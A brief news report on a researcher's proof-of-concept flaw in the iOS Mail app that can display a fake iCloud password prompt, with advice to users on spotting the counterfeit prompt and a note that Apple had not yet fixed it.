New Delhi: A security researcher has discovered a serious bug in the Apple iOS platform that could allow hackers an easy access to users’ iCloud passwords.
The bug, published as a proof-of-concept, exploits a flaw in the default email app-Mail. Since the release of its 8.3 version, the app has failed to remove potentially dangerous code from incoming email messages.
A report on Ars Technica notes that the bug downloads a form from a remote server which looks identical to the original iCloud login prompt which could be displayed each time the flawed message is viewed.
It allows remote HTML content to be loaded thereby replacing the original email message. The exploit can further be programmed to display the password prompt only once to make it look authentic. For this, it uses a feature known as autofocus to hide the dialogue field once a user clicks OK.
To trigger the attack, all that is needed is an email with the HTML tag sent to the target and an Internet-connected computer that hosts the fake login prompt.
The browser in the default Mail app will then embed the image in the email in a way that could be easily perceived as original. The vulnerability could also be used to send ‘beacons’ that let senders know who has viewed email, when it was viewed and from what Internet address.
To avoid any untoward phishing attack, users should press the cancel button without entering credentials when confronted with unexpected login prompts. Also, if they do enter their password into the box, they should do so when no emails are displayed.
To identify a counterfeit prompt, press the home button. If pressing the home button while a prompt is displayed returns a device to the main screen, the prompt is a hoax that shouldn't be trusted.
Apple was told about the vulnerability in January. However, according to the researcher, the company has so far declined to provide a fix.
Comments
0 comment